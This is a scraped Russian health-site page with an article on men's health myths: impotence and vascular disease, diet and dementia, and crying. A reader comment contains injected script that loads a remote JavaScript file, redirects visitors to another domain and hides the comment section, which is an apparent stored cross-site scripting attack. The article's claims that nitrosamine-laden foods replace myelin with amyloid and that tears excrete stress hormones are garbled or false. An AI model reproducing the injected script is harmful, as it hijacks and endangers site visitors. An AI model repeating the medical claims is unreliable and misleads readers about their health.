Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Правда и ложь о мужчинах  >>  Правда и ложь о мужчинах
 
Обратная связь
 

Правда и ложь о мужчинах

Размер шрифта
22 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Сколько веков существует профессия гинеколога и акушерки, а вот андролог – знаток мужской физиологии – возник совсем недавно. За это время успело появиться множество мифов, связанных с мужским здоровьем. Насчет чего мы заблуждаемся, говоря о мужчинах?

1 

Заблуждение первое: импотенция – это психологическая проблема

Импотенция может быть психологической проблемой, в медицине даже существует диагноз психогенной импотенции, однако чаще всего это органическая проблема, связанная с заболеваниями сосудов, или атеросклерозом.

Объяснение

Когда в организме мужчины развивается атеросклероз, страдает вся сосудистая система. Просветы в сосудах полового члена склерозируются, то есть сужаются. По суженным из-за бляшек сосудам, кровь перестает поступать к половому члену в нормальном режиме, а это ведет к нарушению его функций – появляется импотенция.

Но если тоненькие сосуды полового члена сужаются и затрудняют кровоток, то с сосудами сердца дело обстоит более серьезно: они еще закупориваются тромбами. Большое количество мужчин, обратившихся в клинику по поводу импотенции, в течение следующих 2-х лет ложились в больницу по поводу инфаркта миокарда.

1
Макет сосудов: 1) сосуд полового члена; 2) коронарный сосуд; 3) большая артерия нижней конечности

Что делать?

При первых признаках импотенции обратиться к врачу и к кардиологу за консультацией.

Заблуждение второе: путь к сердцу мужчины лежит через желудок

Часто женщины, которые верят в это утверждение, кормят своих мужчин всякими «вкусностями». Это, как правило, что-то жареное, копченое, жирное, выпечка из муки, чай с сахаром и алкоголь.

1
Продукты, которые приводят к деменции и болезни Альцгеймера

Мужчина, который употребляет такие продукты, имеет все шансы на болезнь Альцгеймера. Белые продукты (т.е. сахар, соль, мука высшего сорта), копчености, плавленый сыр, сосиски, колбасы, пиво напичканы нитрозаминами, которые воздействуют на гематоэнцефалический барьер, разрушают миелиновую оболочку нервных волокон головного мозга. В результате миелиновая оболочка заменяется на милоидный белок, который не дает возможности нервным импульсам нормально передаваться. Мозг усыхает, сморщивается, наступает деменция (слабоумие).

1
«Сморщенный» (слева) и здоровый (справа) мозг

Что делать?

Кормите своих мужчин правильной и здоровой пищей: полтарелки обязательно должны заполнять овощи.

1
Правильный ужин для мужчины: половину тарелки занимают овощи

Заблуждение третье: настоящие мужчины не должны плакать

Слеза выполняет ряд важных функций:

  • промывает слезный канал;
  • предотвращает его инфицирование микробами;
  • не дает глазу засохнуть и защищает его от повреждения пылью или другими инородными частицами.

Слеза необходима для выведения из организма всех накопившихся за время стресса гормонов. Вот почему, когда плачешь, становится легче. Слезы помогают организму избавиться от лишнего количества этих веществ.

1

Главные функции слезы:

  • увлажняет и защищает слизистые оболочки носа и глаза;
  • содержит фермент лизоцим, разрушающий клеточные стенки бактерий;
  • слеза выводит лишние гормоны.

Что делать?

Плакать необходимо для здоровья. И мужчины не исключение. Давайте своему мужчине иногда поплакать, или хотя бы пустить одну-единственную скупую мужскую слезу.

Настоящие мужчины тем и отличаются от сказочных принцев, что они не идеальны, но именно поэтому мы их и любим. Любите своих мужчин правильно, чтобы они были здоровы и жили долго!

 

 

Сюжеты по теме:
Правда и ложь о мужчинах. Разбираем стереотипы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.